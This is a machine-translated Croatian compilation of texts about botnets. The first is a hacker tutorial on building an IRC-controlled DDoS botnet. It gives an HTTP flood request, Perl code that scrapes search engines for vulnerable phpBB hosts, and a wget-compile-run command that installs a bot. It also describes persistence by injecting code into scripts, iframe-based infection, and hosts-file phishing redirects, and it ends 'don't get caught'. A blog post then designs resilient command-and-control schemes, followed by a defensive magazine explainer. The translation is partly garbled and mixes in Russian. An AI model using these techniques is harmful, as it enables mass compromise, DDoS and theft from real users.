Stvaramo vlastiti borbeni botnet. Što bi trebao biti idealan botnet Botneti

Sustavi zaštite stalno se poboljšavaju, programeri postaju iskusniji. Sada se čini sve manje dobro poznatih grešaka.

[prolog]
Internet raste velikom snagom. Hakeru je sve teže i teže pronaći ranjivosti. Administratori koriste najbolje stručnjake za sigurnost kako bi zaštitili razvoj. Prepoznajete li svoje misli? Zapravo, Internet je pun ranjivosti, ali od njih je malo koristi. Pa, to je još kako izgledati Evo, zamislite situaciju, uhvatio vas je neki mrežni gad, želite ga kazniti. Danas ćemo govoriti o stvaranju vlastitog borbenog botneta.
Dakle, što je "bot"? Neupućena osoba odmah se sjeti glupih protivnika u računalnim igrama, koje upucate u dvije minute. Da, ovo je djelomično točno. U našem slučaju, "bot" je program koji izvršava naredbe ugrađene u njega. Kao ništa posebno. Netko će prigovoriti: "Kažu, ovo sam napisao u dobi od pet godina, pritisnete gumb i program se, olya-la, zatvori" Zaboravimo djetinjstvo. Svi znamo da su mogućnosti kodiranja beskrajne i da se može koristiti za dobro i zlo. Naravno, uvijek koristimo naš razvoj s dobrim namjerama. "Botnet" je skup botova okupljenih u jednom centru, koji sinkronizirano izvršavaju naredbe vlasnika. Usput, botovi su uglavnom više usmjereni na Windows strojeve. Ovdje možete ukrasti lozinke, instalirati socks i formatirati vijak. Odstupit ću od pravila i reći vam kako napraviti botnet od nix strojeva. Glavna funkcija našeg bota je organizacija DDOS napada. Ovo je idealan način za korištenje širokih kanala nix poslužitelja. Idemo izračunati. Server koji treba "napuniti" je na kanalu od 100Mb. Odnosno, 10-20 botova koji stoje na istom kanalu u trenu će preplaviti server. Ako se možete sakriti iza vatrozida od jednog poslužitelja, onda, nažalost, nema spasa od većeg broja botova

[Piše bot]
Možete pronaći popis primjera bota na poveznici na kraju članka. Pogledajmo kod. (uh, Dream se opet kontrolira preko IRC-a? WEB je bolji!). Inače, upravljanje putem IRC-a odabrano je zbog svoje interaktivnosti. Recimo da želim koristiti lokalne nuklearne eksploatacije na nekoliko poslužitelja u botnetu. Jednostavno ću izvršiti naredbu SH uname -a pomoću bota i odmah pronaći računalo koje trebam. Zatim ću, nakon što sam također izvršio naredbu u IRC klijentu, preuzeti backdoor i dobiti interaktivnu ljusku za daljnje radnje. Mogućnosti su beskrajne. Reći ćete da se takva kontrola može provoditi i putem WEB-a, ali zašto ponovno učitavati stranicu i gubiti promet? Puno je praktičnije promatrati sve u stvarnom vremenu (iako, s botnetom od više od 1000 botova, možete se pobrinuti za praktičnost sučelja - napomena zdravog razuma). Mnogi ljudi misle da je organiziranje DDOS-a vrlo komplicirana stvar. Evo primjera koda za normalan napad:

GET /server.org HTTP/1.0\r\nVeza: Keep-Alive\r\nKorisnički agent: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nPrihvati: slika/gif, slika/x-xbitmap, slika/jpeg, slika/pjpeg, slika/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso- 8859-1,*,utf-8\r\n\r\n

To jest, jednostavno šaljemo zahtjev poslužitelju prisiljavajući odgovor na njega. Štoviše, šaljemo ga sve dok poslužitelj ne padne zbog nedostatka prometa ili procesorskog vremena. Ali osim ako niste ograničeni na jednog nix bota, trebate stvoriti Windows botnet, na primjer, temeljen na AgoBotu. Da biste to učinili, možete stvoriti neki kod za bota koji će skenirati ranjivosti lsasl / dcom stroja koji se povezuje s poslužiteljem na kojem je bot instaliran.

[Stvori botnet]
Zapravo, stvaranje botneta je vrlo jednostavno. Da bismo to učinili, moramo pronaći ranjivost u bilo kojoj web skripti. Pronađena ranjivost trebala bi omogućiti izvršavanje naredbi tumača ljuske. Kada pronađete ranjivost, obratite pozornost na naziv važne datoteke, njen naslov, naziv ranjivog sustava. Sada, uz pomoć ovih podataka, trebate napraviti dobar upit za pretraživanje. Na primjer, uzmite dobro poznatu ranjivost u phpBB-u<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") ili sljedeći; print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu=<$sock>; zatvori($čarapa);

Wget http://server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

Ovdje možete vidjeti dva problema odjednom. wget i gcc možda neće biti prisutni ili će njihova upotreba biti zabranjena. Ovdje će nam pomoći fech, curl i get preuzimanja ili preglednik lynx konzole ili koristiti ftp protokol. Njegova implementacija je kompliciranija, ali prednost je što je ftp posvuda. Što se prevoditelja tiče, možete jednostavno kompajlirati binarnu datoteku na svojoj ljusci i nadati se da će sve biti u redu s kompatibilnošću ili prepisati bot u interpretiranim jezicima - Perl ili PHP. Svaka metoda ima svoje prednosti i nedostatke, a koju ćete koristiti, izbor je na vama. Navikao sam maksimalno koristiti uhvaćeni server. Uostalom, bot na nix poslužitelju će trajati samo do prvog ponovnog pokretanja stroja. Postoji jedan zanimljiv izlaz iz ove situacije. Bot će tražiti čitljive datoteke (.pl, .php) dostupne za pisanje i dodati im kod za preuzimanje i pokretanje bota. Ili možete stvoriti još jedan šraf botnet. Također je lako implementirati. Ovdje nam je potrebna ranjivost u internet pregledniku (Internet Explorer, Opera, Mozilla) koja dovodi do preuzimanja i pokretanja željene datoteke. Zatim se stvara inframe zapis koji učitava naš maliciozni kod. Ovaj unos se dodaje u sve indeksne datoteke (ili u sve gdje postoji html kod, sve ovisi o vašoj drskosti). Mala Haz skripta, koju ćete također pronaći u arhiveru, odlično radi ovaj posao. Bugtrack je ispunjen zapisima kritičnih ranjivosti u Internet Exploreru, tako da ćemo također imati botnet na Windows sustavima pod našom kontrolom (gore sam spomenuo njegove prednosti). To je sve, pokrenite našeg crva za pretraživanje na ljusci velike brzine, popijte kavu (pivo, votku, sok od rajčice), idite na IRC kanal naveden u svojstvima bota i pratite broj svojih podređenih. Na kraju, želim pozdraviti sve koji me poznaju i poželjeti vam puno sreće. Nemoj da te uhvate.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Ranjivost u phpBB-u je relevantna do verzije 2.0.16, iako programeri tvrde da su je popravili u 2.0.11

http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Krađa identiteta
Vrlo je zgodno koristiti botove kao organizaciju za krađu identiteta. Da bismo to učinili, potrebne su nam posebne stranice izoštrene za phishing koje oponašaju stranicu koja nam je potrebna i dobar hosting, namjenski poslužitelj ili VDS. Takve stranice možete napraviti sami, kupiti, pronaći na netu. Izbor je ogroman. Najčešće se phishing organizira na stranicama: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om i drugima, na ovaj ili onaj način povezanim s e-trgovinom. Zatim Windows bot prepisuje datoteku \system32\drivers\etc\hosts dodavanjem IP adrese vašeg poslužitelja u nju i dodjeljivanjem pseudonima stranici koja vam je potrebna. Format datoteke je:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Odnosno, upisivanjem stranica e-gold.com i paypal.com u preglednik, korisnik dolazi na naš server ne sumnjajući ništa. Zauzvrat, na poslužitelju phishera, unosi o odgovarajućim domenama dodaju se u httpd.conf.

DocumentRoot "/home/e-gold.com/www" ServerName "www.e-gold.com" Server Alias ​​​​"e-gold.com" "www.e-gold.com"

Naravno, u retku preglednika nalazit će se poznata adresa e-gold.com, pa će se čak i napredni korisnik prijaviti na web mjesto ne sumnjajući ništa. Da dovršim sliku, reći ću da ako korisnik koristi proxy poslužitelj, ova metoda neće raditi

Botovi za svačiji ukus
Agobot/Phatbot/Forbot/XtremBot
Ovo je najbolja obitelj botova. Napisano u C++. Imaju mnoge značajke protiv detekcije i više od 500 modifikacija zahvaljujući jasno definiranoj modularnoj strukturi.
SDBot/RBot/UrBot/UrXBot
Trenutačno vrlo popularni botovi za izvođenje DDOS napada. Imaju mnoge dodatne značajke. Kao što je otvaranje Sock4, keylogger, automatski skener lsass i dcom ranjivosti. Također ima funkciju preusmjeravanja zahtjeva na stranice antivirusnih tvrtki na lokalni poslužitelj uređivanjem \system32\drivers\etc\hosts i instaliranjem malog lažnog web poslužitelja na portu 80.
DSNX roboti
Ovaj bot može izvoditi DDOS napade, skeniranje portova i još neke sitnice.
Q8 roboti
Odličan bot za nix sustave. Odlikuje se kompaktnim kodom (27 Kb, sastoji se od jedne datoteke) i dobrom funkcionalnošću. Mogućnost dinamičkog ažuriranja preuzimanjem i pokretanjem nove datoteke. Dobro implementira glavne implementacije DDOS-a (SYN-poplava, UDP-poplava). Sposoban izvršavati naredbe sustava. Također se dobro kamuflira u sustavu.
kaiten
Također dobar bot za Unix/Linux sustave. Mogućnost otvaranja udaljene ljuske na snimljenom poslužitelju.
Botovi temeljeni na Perlu
Ovo su vrlo mali botovi napisani u Perlu. Koristi se za DDOS napade na sustave temeljene na Unixu.

---
Članak ima veliku pristranost prema hakiranju, pa nije jasno - pitajte.

Nije ni čudo što sam objavio nacrt svoje bilješke o peer-to-peer mrežama. Komentari čitatelja bili su od velike pomoći. Upravo su me oni inspirirali za daljnji rad u tom smjeru. Što je od toga ispalo - pogledajte ispod kroja.

Kao što vidite iz naslova posta, danas ćemo govoriti samo o botnetovima. Zaboravimo na neko vrijeme dijeljenje datoteka, proxy mreže, peer-to-peer blogove i p2p valutu.

Riječ "botnet" ne treba shvatiti kao nešto ilegalno. Kada korisnik dobrovoljno preuzme i instalira "bot" kako bi donirao svoj promet i računalne resurse znanstvenom projektu, to je također botnet. Sukladno tome, botmaster nije nužno kriminalac. Grupa od 30 znanstvenika koji rade na znanstvenom projektu ujedno je i "botmaster".

1. Kontrola botneta preko servera

Najlakši način za upravljanje botovima je pokretanje irc/http poslužitelja. Preko njega će botovi primati naredbe i uz njegovu pomoć slati rezultat njihovog izvršenja.

Crtam najbolje što znam :) U ovom slučaju ilustracija možda i nije potrebna, ali odlučio sam vas pripremiti na šok koji će proizvesti ostali crteži.

  • Vrlo jednostavna implementacija, posebno u slučaju IRC-a.
  • Brz odgovor bota.
  • Možete izdavati naredbe i cijeloj mreži i određenom botu.
  • Ako se mreža sastoji od stotina čvorova, dovoljan je jedan kanal u DalNetu za upravljanje njome. Za veće mreže možete izdvojiti za jeftin (oko 300 rubalja mjesečno) web hosting.
  • U slučaju HTTP-a-server uvelike pojednostavljuje razvoj lijepog korisničkog sučelja. Ovo je važno ako koristimo botnet u nekom web servisu.
  • Opterećenje poslužitelja. Broj čvorova u najvećim botnetima mjeri se u milijunima. Za upravljanje takvom gomilom nije dovoljan jedan poslužitelj.
  • Ako se nešto dogodi poslužitelju (kvar na mreži, DDoS, požar u podatkovnom centru), mreža će prestati.
  • Jedan poslužitelj je lako zaštititi vatrozidom. To mogu učiniti i davatelj i Kaspersky Lab proizvodi na računalu korisnika.
  • Botmastera je relativno lako pronaći. Jednom sam zaboravio na VPN - pričekaj goste u uniformama.
  • U slučaju IRC-a, naredbe primaju samo botovi na mreži. Ako bot uđe na kanal dvije minute nakon slanja naredbe, to će biti "off topic".
  • Broj botova i njihov IP možete odrediti odlaskom na IRC kanal. Zaštita kanala lozinkom neće pomoći, jer je potonju lako pronaći iz koda bota.

2. Kontrola putem IRC mreže

Logičan korak za rješavanje nedostataka prethodne metode je napraviti ne jedan poslužitelj, već nekoliko. Po mom mišljenju, najlakši način da to učinite je podizanje vlastite IRC mreže. U ovom slučaju, cjelokupna odgovornost za prijenos podataka između poslužitelja pada na IRC protokol. Sa strane bota, neće biti razlike u odnosu na prethodno rješenje.

  • Jednostavna implementacija, iako ćete morati petljati s postavljanjem poslužitelja.
  • Botovi i dalje brzo reagiraju na naredbe.
  • I dalje je moguće izdavati naredbe određenom botu.
  • Balansiranje opterećenja između poslužitelja, zaštita od DDoS-a i više sile. Desetak dobrih servera može biti dovoljno za mrežu od milijun botova.
  • Ako neki od poslužitelja zakažu, imate vremena da ih zamijenite.
  • Ako koristite IRC i zbunjuje tisuću botova koji sjede na jednom kanalu, koristite više kanala. Sukladno tome, različitim dijelovima mreže možete dati različite zadatke.
  • Morat ćete izdvojiti za poslužitelje / VDS.
  • Možete vatrozidom postaviti sve poslužitelje u isto vrijeme i botmaster ih neće imati vremena zamijeniti.
  • Botmasteru je još uvijek prilično lako ući u trag.
  • U slučaju IRC-a, broj botova i njihove IP adrese i dalje su vidljive.
  • Botovi koji su se upravo pridružili kanalu su van teme.

Pojam trastring (prsten povjerenja, krug/prsten povjerenja) prvi put sam čuo od druga Nickolas-a u komentarima na prethodni post. Riječ je o povjeravanju funkcije "poslužitelja" dijelu botneta.

  • Nisu potrebni poslužitelji.
  • Trastring se može sastojati od stotina čvorova. Podizanje i kontroliranje tolikog broja irc/http poslužitelja nije lako.
  • Botovi ne bi trebali uvijek održavati vezu s trastringom. Dovoljno je svakih 5-10 minuta provjeriti ima li novih naredbi. Svaka naredba mora imati TTL za koji je pohranjena u trastringu.
  • Velik broj "poslužitelja" osigurava otpornost mreže na sve vrste katastrofa. Kada dio prstena umre, botmaster može dati naredbu za stvaranje novog trastringa. Ili čvorovi prstena mogu to učiniti sami (potrebni su digitalni potpisi i pristanak određenog postotka trastringa).
  • Neka se trastring sastoji od 512 čvorova, najmanje 50% je stalno online. Ako postoji 1.000.000 botova na mreži, a svaki od njih je stalno online, bit će manje od 4.000 botova po trastring čvoru. Kada bot zatraži naredbe (ili pošalje rezultat) jednom svakih 10 minuta, svaki prstenasti čvor će istovremeno obraditi prosječno 7 veza. Prilično malo za mrežu ove veličine, zar ne?
  • Točan popis svih botova može dobiti samo botmaster.
  • Možete izdavati naredbe određenom botu ili grupi botova.
  • Brza reakcija botova na naredbe.
  • Botmastera je teško pronaći.

Jedini nedostatak koji vidim je složenost implementacije.

4. Peer-to-peer mreže

Prema internetskim izvorima, P2P botneti trenutno su vrlo popularni. Među tim izvorima najveću pažnju zaslužuje. Svaki čvor u takvoj mreži poznaje samo nekoliko "susjednih" čvorova. Botmaster šalje naredbe na nekoliko mrežnih čvorova, nakon čega se prenosi od susjeda do susjeda.

Popis susjeda se daje botovima jednom na posebnom poslužitelju. To može biti, na primjer, hakirana stranica. Poslužitelj ne radi ništa drugo, potreban je samo prilikom dodavanja čvorova u botnet.

  • Implementacija je nešto jednostavnija nego u prethodnom paragrafu.
  • Minimalno opterećenje na svim mrežnim čvorovima. Veličina botneta praktički je neograničena.
  • Otporan na DDoS, gašenja čvorova itd. Vatrozid za p2p botnet gotovo je nemoguć.
  • Nema trajnih veza, kao što je slučaj s IRC-om.
  • Trebamo poslužitelj, iako ne zadugo.
  • Čvorovi s vremena na vrijeme odumiru, što utječe na povezanost mreže.
  • Da biste dobili popis svih botova, na primjer, trebate ih uputiti da pristupe određenom mjestu. U tom slučaju nema jamstva da će popis dobiti samo botmaster.
  • Da biste dali naredbu određenom čvoru, morate je poslati cijeloj mreži ili se izravno spojiti na čvor.
  • Spor odgovor botova na naredbe.
  • Da biste poslali "dugu" naredbu, na primjer, s popisom URL-ova, morate koristiti poslužitelj treće strane, inače će se reakcija botova još više usporiti.
  • Lakše je pronaći botmastera nego u prethodnom primjeru, zbog korištenja neke vrste poslužitelja.

Naravno, mogao bih biti u krivu, ali po mom mišljenju, p2p botneti su puno gori od trastringa. Možda proizvođači antivirusa o nečemu šute?

5. Cjelovito rješenje

Jedan od načina da izmislite nešto novo i dobro je prekrižiti nešto staro. Spojili smo telefon, računalo, magnetofon, fotoaparat i kamkorder - dobili smo pametni telefon. Nećete nikoga iznenaditi računalom i klimom u automobilu. Zalijepite magnet za hladnjak na svaki jogurt i prodaja će vrtoglavo porasti.

Važno je zapamtiti da u slučaju neuspješnog križanja možemo dobiti jedinku koja nije dobra za ništa. Zvuči kao genetski algoritmi, zar ne? Uzmimo naizgled dobru ideju - p2p botnet, gdje je trastring odgovoran za dodjeljivanje susjeda. Onda nam ne treba nikakav server!

Ali u ovom slučaju, složenost implementacije će se povećati, iako ne mnogo. Preostali problemi p2p botneta ostat će neriješeni. Pobjeda je beznačajna, rezultat je 1:1.

Nakon što sam neko vrijeme sjedio s papirom i olovkom, rodila mi se sljedeća ideja. Koliko ja znam, to nikada prije nije bilo izrečeno, a ja sam prvi koji je to smislio. HR plus 100.

Što ako će mreža imati dva stanja - "aktivno" i "pasivno". U pasivnom stanju, botnet radi prema p2p shemi. Botmaster šalje naredbu "mobilize troops" i mreža se pretvara u trastring. U svojoj naredbi botmaster mora odrediti čvorove praćenja i vrijeme za koje mreža mijenja svoje stanje. Da bi prsten bio veći, možete dati uputu nekoliko robota da imenuju svoje susjede. Nadalje, sve naredbe se prenose kroz trastring. On je također odgovoran za dodjeljivanje "susjeda" novim čvorovima. Ako se naknadno pokaže da je TTL prstena nedovoljan, može se izdati naredba "produži aktivno stanje".

Takav botnet neće naslijediti nijedan nedostatak p2p mreže i imat će sve prednosti trastringa, kao i sljedeće:

  • Povećana otpornost na ddos ​​napade i mrežne filtre, poput p2p mreže.
  • Minimalna potrošnja resursa od strane botova tijekom prekida mreže. Botmaster ne treba pratiti stanje trastringa i birati nove čvorove za njega.
  • Prilikom kreiranja trastringa odabiru se samo oni čvorovi koji su trenutno na mreži. Botovi će se spojiti na prsten pri prvom pokušaju (neko vrijeme).
  • Popis "susjeda" povremeno se ažurira. Svejedno, IP čvorovi uključeni u privremeni prsten poznati su cijelom botnetu. Pa neka te čvorove smatraju susjedima ako se neki od pravih susjeda dugo nije pojavio na mreži.

A jedini nedostatak koji ovdje vidim je složenost implementacije. Ali to zapravo nije problem.

6. Što je važno zapamtiti

Do sada sam šutio o nekim točkama, jer su one svojstvene bilo kojoj od navedenih metoda kontrole botneta. Trebali biste se usredotočiti na njih.

  • Neki čvorovi ne mogu prihvatiti dolazne veze zbog vatrozida ili NAT-a. U najmanju ruku, to treba uzeti u obzir kada pišete bota. Na primjer, kada distribuira naredbe u p2p mreži, bot mora povremeno kontaktirati svoje susjede, a ne čekati naredbe od njih.
  • Treba pretpostaviti da se sve naredbe poslane mreži slušaju. U najmanju ruku, zainteresirana osoba može modificirati kod bota u te svrhe. Međutim, ima smisla šifrirati sav promet koji se prenosi na mreži. To će u najmanju ruku zakomplicirati analizu botneta.
  • Sve naredbe botmastera moraju biti digitalno potpisane. Lozinke nisu dobre jer se mogu presresti.
  • Budući da govorimo o implementaciji, napominjem da svaki botnet mora imati najmanje tri naredbe - ažuriranje botova, ažuriranje botmaster ključa i samouništenje cijele mreže.
  • U mreži postoje "špijunski" čvorovi. Neki od njih su uključeni u trastring. Istodobno, ne znamo ciljeve koje ovi "špijuni" ostvaruju - to može biti određivanje IP-a botmastera, ometanje izvršavanja naredbi, onesposobljavanje mreže, preuzimanje kontrole nad botnet-om i tako dalje. Konkretno, to znači da bi botovi trebali odabrati nasumični čvor kada se spajaju na prsten, umjesto da stalno koriste isti.
  • Na slici su čvorovi praćenja međusobno povezani, no puno je praktičnije implementirati prsten u obliku male p2p mreže, odnosno po principu “susjeda”.

Također napominjem da rješenja 1 i 2 (poslužitelj, mnogo poslužitelja) gube mnoge nedostatke i dobivaju nekoliko pluseva od rješenja 3 (trastring) kada koriste HTTP protokol. Ponovno prođite kroz ove odlomke da biste shvatili što mislim.

7. Zaključci

Za manje mreže dobro rješenje je korištenje IRC-a. Na primjer, ako želite stvoriti vlastitu malu mrežu za distribuirano računalstvo, instalirajte bota na kućno računalo, prijenosno računalo, netbook, radno računalo (ako politika tvrtke to dopušta) i upravljajte mrežom putem DalNeta. Ako je potrebno, kasnije se mreža može "pumpati" na trastring. Dat ćete odgovarajuću naredbu, zar ne?

Ako botnet treba lijepo web sučelje, možda ima smisla napisati dodatni program koji će preuzimati naredbe s web poslužitelja i slati ih na IRC. Razmotrite barem ovaj pristup.

Univerzalna rješenja su trastring i p2p+trastring. Takve će mreže idealno funkcionirati bez obzira koliko čvorova imaju, 1 ili 1.000.000, bez ikakvih poslužitelja.

Zbog očitih nedostataka "čistog p2p-a" u odnosu na prsten, ostaje mi nejasno zašto se smatra dobrim rješenjem. Zasigurno botovi koji čine mrežu imaju mnogo korisnih značajki. Zašto ne dodati još jedan mali korisni teret - mobilizaciju mreže u trastring?

To je, možda, sve. Bit će mi drago svakom vašem komentaru. Osobito s kritikom, ukazivanjem na netočnosti/nedosljednosti u tekstu i vašim idejama o temi koja se pokreće.

Danas su botnetovi postali jedan od glavnih alata kibernetičkih kriminalaca. ComputerBild će vam reći što su botneti, kako rade i kako spasiti svoje računalo od ulaska u zombi mrežu.

Botnet ili zombi mreža mreža je računala zaraženih zlonamjernim softverom koja napadačima omogućuje daljinsko upravljanje tuđim strojevima bez znanja njihovih vlasnika. Posljednjih su godina zombi mreže postale stabilan izvor prihoda kibernetičkih kriminalaca. Konstantno niski troškovi i minimalno znanje potrebno za upravljanje botnetima doprinose rastu popularnosti, a time i broja botnetova. DDoS napadi ili slanje neželjene pošte izvršeno korištenjem zombi mreža, napadači i njihovi klijenti zarađuju tisuće dolara.

Je li moje računalo zaraženo botom?

Na ovo pitanje nije lako odgovoriti. Činjenica je da je gotovo nemoguće pratiti intervenciju botova u svakodnevnom radu računala, jer to ni na koji način ne utječe na performanse sustava. Međutim, postoji nekoliko znakova po kojima možete utvrditi da je bot prisutan u sustavu:

Nepoznati programi pokušavaju se spojiti na Internet, o čemu vatrozid ili antivirusni softver povremeno ogorčeno izvještavaju;

Internetski promet postaje vrlo visok, iako se webom koristite vrlo umjereno;

Novi se pojavljuju na popisu pokrenutih procesa sustava, maskirajući se kao obični Windows procesi (na primjer, bot se može nazvati scvhost.exe - ovo je ime vrlo slično nazivu procesa sustava Windows svchost.exe; prilično je teško uočiti razliku, ali je moguće).

Zašto se stvaraju botneti?

Botneti su stvoreni da zarađuju. Postoji nekoliko područja komercijalno isplative upotrebe zombi mreža: DDoS napadi, prikupljanje povjerljivih informacija, spam, phishing, spam tražilice, varanje brojača klikova itd. Treba napomenuti da će svaki smjer biti isplativ, bez obzira koji napadač odabere , i Botnet omogućuje istovremeno provođenje svih ovih aktivnosti.

DDoS napad (od engleskog Distributed Denial-of-Service) je napad na računalni sustav, poput web stranice, čija je svrha dovesti sustav u "pad", odnosno stanje kada može više ne primaju i ne obrađuju zahtjeve legitimnih korisnika. Jedna od najčešćih metoda provođenja DDoS napada je slanje više zahtjeva žrtvinom računalu ili stranici, što dovodi do uskraćivanja usluge ako resursi napadnutog računala nisu dovoljni za obradu svih dolaznih zahtjeva. DDoS napadi su moćno oružje za hakere, a botnet je savršen alat za njihovo izvođenje.

DDoS napadi mogu biti i sredstvo nepoštenog tržišnog natjecanja i djela kibernetičkog terorizma. Vlasnik botneta može pružiti uslugu bilo kojem poduzetniku koji nije previše skrupulozan - izvršiti DDoS napad na mjesto svog konkurenta. Napadnuti resurs će "pasti" nakon takvog opterećenja, naručitelj napada će dobiti privremenu prednost, a kibernetički kriminalac će dobiti skromnu (ili ne toliko) nagradu.

Na isti način i sami vlasnici botneta mogu koristiti DDoS napade za iznuđivanje novca od velikih tvrtki. Istovremeno, tvrtke se radije pridržavaju zahtjeva kibernetičkih kriminalaca, budući da je uklanjanje posljedica uspješnih DDoS napada vrlo skupo. Na primjer, u siječnju 2009. GoDaddy.com, jedan od najvećih hostova, bio je podvrgnut DDoS napadu, uslijed čega su tisuće stranica hostiranih na njegovim poslužiteljima bile nedostupne gotovo jedan dan. Financijski gubici domaćina bili su ogromni.

U veljači 2007. izvršena je serija napada na korijenske DNS poslužitelje čiji rad izravno utječe na normalno funkcioniranje cjelokupnog interneta. Malo je vjerojatno da je cilj ovih napada bio kolaps World Wide Weba, jer je postojanje zombi mreža moguće samo ako Internet postoji i normalno funkcionira. Najviše od svega, bilo je to poput demonstracije moći i mogućnosti zombi mreža.

Oglašavanje usluga za provedbu DDoS napada otvoreno je objavljeno na mnogim forumima o relevantnim temama. Cijene napada kreću se od 50 do nekoliko tisuća dolara po danu kontinuiranog rada DDoS botneta. Prema stranici www.shadowserver.org, u 2008. godini bilo je oko 190.000 DDoS napada, od kojih su kibernetički kriminalci mogli zaraditi oko 20 milijuna dolara. Naravno, u ovaj iznos nisu uračunati prihodi od ucjena, koje je jednostavno nemoguće izračunati.

Prikupljanje povjerljivih podataka

Povjerljive informacije koje su pohranjene na računalima korisnika uvijek će privući uljeze. Od najvećeg interesa su brojevi kreditnih kartica, financijski podaci i lozinke za različite servise: poštanske sandučiće, FTP poslužitelje, instant messengere itd. U isto vrijeme, moderni zlonamjerni softver omogućuje napadačima da odaberu upravo one podatke koji ih zanimaju – samo ih uploadaju na PC odgovarajući modul.

Napadači mogu ili prodati ukradene informacije ili ih iskoristiti u svoju korist. Stotine oglasa za prodaju bankovnih računa svakodnevno se pojavljuju na brojnim forumima na webu. Cijena računa ovisi o iznosu novca na korisničkom računu i kreće se od 1 do 1500 USD po računu. Donja granica ukazuje na to da su tijekom konkurencije kibernetički kriminalci koji se bave ovom vrstom poslovanja prisiljeni smanjiti cijene. Kako bi doista zaradili puno novca, potreban im je stalan priljev svježih podataka, a to zahtijeva stalan rast zombi mreža. Kartičare posebno zanimaju financijski podaci – uljezi koji se bave krivotvorenjem bankovnih kartica.

Koliko su takve operacije isplative može prosuditi poznata priča o skupini brazilskih kiberkriminalaca koji su uhićeni prije dvije godine. Uspjeli su podići 4,74 milijuna dolara s bankovnih računa običnih korisnika pomoću informacija ukradenih s računala. Kriminalci koji se bave krivotvorenjem dokumenata, otvaranjem lažnih bankovnih računa, obavljanjem nezakonitih transakcija i sl. također su zainteresirani za stjecanje osobnih podataka koji nisu izravno povezani s novcem korisnika.

Druga vrsta informacija koje prikupljaju botnetovi su adrese e-pošte, a za razliku od brojeva kreditnih kartica i brojeva računa, mnoge adrese e-pošte mogu se izdvojiti iz adresara jednog zaraženog računala. Prikupljene adrese stavljaju se na prodaju, a ponekad i "po težini" - po megabajtu. Glavni kupci takvog "proizvoda" su spameri. Popis od milijun e-mail adresa stoji od 20 do 100 dolara, a slanje naručenih spamerima na istih milijun adresa stoji 150-200 dolara. Korist je očita.

Kriminalci su također zainteresirani za račune raznih plaćenih usluga i internetskih trgovina. Oni su svakako jeftiniji od bankovnih računa, ali njihova je implementacija povezana s manjim rizikom od uznemiravanja od strane policijskih organa.

Milijuni spam poruka kruže svijetom svaki dan. Slanje neželjene pošte jedna je od glavnih funkcija modernih botneta. Prema Kaspersky Labu, oko 80% sve neželjene pošte šalje se putem zombi mreža. S računala korisnika koji poštuju zakon šalju se milijarde pisama s reklamama za Viagru, kopijama skupih satova, online kockarnicama itd., začepljujući komunikacijske kanale i poštanske sandučiće. Na taj način hakeri ugrožavaju računala nedužnih korisnika: adrese s kojih se šalje pošta nalaze se na crnoj listi antivirusnih tvrtki.

Posljednjih godina opseg spam usluga se proširio: pojavio se ICQ spam, spam na društvenim mrežama, forumima i blogovima. I to je također „zasluga“ vlasnika botneta: uostalom, nije teško bot klijentu dodati dodatni modul koji otvara horizonte za novi posao sa sloganima poput „Spam na Facebooku. Jeftin." Cijene neželjene pošte razlikuju se ovisno o ciljanoj publici i broju adresa na koje se šalje. Raspon cijena ciljanih slanja je od 70 USD za stotine tisuća adresa do 1000 USD za nekoliko desetaka milijuna adresa. Tijekom prošle godine spameri su zaradili oko 780 milijuna dolara od slanja e-pošte.

Generiraj neželjenu poštu pretraživanja

Druga mogućnost korištenja botneta je povećanje popularnosti stranica u tražilicama. Radeći na optimizaciji za tražilice, administratori resursa pokušavaju povećati poziciju web stranice u rezultatima pretraživanja, jer što je viša, to će više posjetitelja doći na web stranicu putem tražilica i, prema tome, vlasnik web stranice će dobiti više prihoda , primjerice od prodaje oglasnog prostora na web stranicama. Mnoge tvrtke plaćaju webmasterima puno novca da dovedu stranicu na prvu poziciju u "tražilicama". Vlasnici botneta špijunirali su neke od njihovih trikova i automatizirali proces optimizacije za tražilice.

Kada vidite u komentarima na svoj unos u LiveJournalu ili uspješnu fotografiju objavljenu na foto hostingu, puno poveznica koje je stvorila vama nepoznata osoba, a ponekad i vaš "prijatelj" - nemojte se iznenaditi: netko je upravo naručio promicanje svojih resursa vlasnicima botneta. Posebno stvoreni program učitava se na zombi računalo i u ime svog vlasnika ostavlja komentare na popularnim resursima s vezama na web mjesto koje se promovira. Prosječna cijena ilegalnih spam usluga pretraživanja je oko 300 USD mjesečno.

Koliko koštaju osobni podaci

Trošak ukradenih osobnih podataka izravno ovisi o zemlji u kojoj živi njihov pravi vlasnik. Na primjer, potpuni podaci stanovnika SAD-a koštaju 5-8 dolara. Na crnom su tržištu posebno cijenjeni podaci stanovnika Europske unije - dva do tri puta su skuplji od podataka građana Sjedinjenih Država i Kanade. To se može objasniti činjenicom da kriminalci mogu koristiti takve podatke u bilo kojoj zemlji koja je dio EU. U prosjeku, cijena kompletnog podatkovnog paketa o jednoj osobi diljem svijeta je oko 7 USD.

Nažalost, za nekoga tko je odlučio organizirati botnet od nule, neće biti teško pronaći upute na internetu za stvaranje zombi mreže. Prvi korak: stvorite novu zombi mrežu. Da biste to učinili, morate zaraziti računala korisnika posebnim programom - botom. Za zarazu se koriste neželjene pošte, objavljivanje poruka na forumima i društvenim mrežama te druge metode; često je bot obdaren funkcijom samorazmnožavanja, poput virusa ili crva.

